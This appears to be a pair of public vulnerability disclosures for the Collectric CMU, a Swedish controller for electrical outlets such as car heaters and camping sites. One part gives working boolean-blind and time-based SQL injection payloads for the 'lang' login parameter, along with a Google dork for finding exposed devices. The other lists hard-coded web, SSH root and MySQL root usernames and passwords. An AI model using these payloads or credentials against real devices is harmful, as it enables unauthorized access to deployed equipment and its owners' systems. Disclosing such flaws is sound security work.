53 lines
No EOL
1.7 KiB
Text
53 lines
No EOL
1.7 KiB
Text
# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection
|
|
# Google Dork: "Inloggning Collectric CMU"
|
|
# Discoverer: Simon Brannstrom
|
|
# Date: 2018-09-15
|
|
# Vendor Homepage: http://ourenergy.se/
|
|
# Software Link: n/a
|
|
# Version: All known versions
|
|
# Tested on: Linux
|
|
# CVE: N/A
|
|
# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters,
|
|
# camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
|
|
# More vulnerabilities exists, see my other vulnerability reports.
|
|
|
|
# Parameter: lang (GET)
|
|
# Type: boolean-based blind
|
|
# Title: AND boolean-based blind - WHERE or HAVING clause
|
|
|
|
Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in
|
|
|
|
# Type: AND/OR time-based blind
|
|
# Title: MySQL >= 5.0.12 AND time-based blind
|
|
|
|
Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in
|
|
|
|
|
|
# Exploit Title: Collectric CMU - Hard-coded SSH/MySQL/Web credentials.
|
|
# Discoverer: Simon Brannstrom
|
|
# Date: 09/15/2018
|
|
# Vendor Homepage: http://ourenergy.se/
|
|
# Software Link: n/a
|
|
# Version: All known versions
|
|
# Tested on: Linux
|
|
# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface.
|
|
More vulnerabilities exists, see my other vulnerability reports.
|
|
|
|
---
|
|
Web Portal hard-coded credentials:
|
|
username: sysadmin
|
|
password: zoogin
|
|
|
|
SSH user/root credentials:
|
|
username: kplc
|
|
password: kplc
|
|
|
|
username: root
|
|
password: zoogin
|
|
|
|
*The SSH server is running Dropbear sshd 0.52 (protocol 2.0) which requires diffie-hellman-group1-sha1.
|
|
|
|
MySQL root credentials:
|
|
username: root
|
|
password: sql4u
|
|
--- |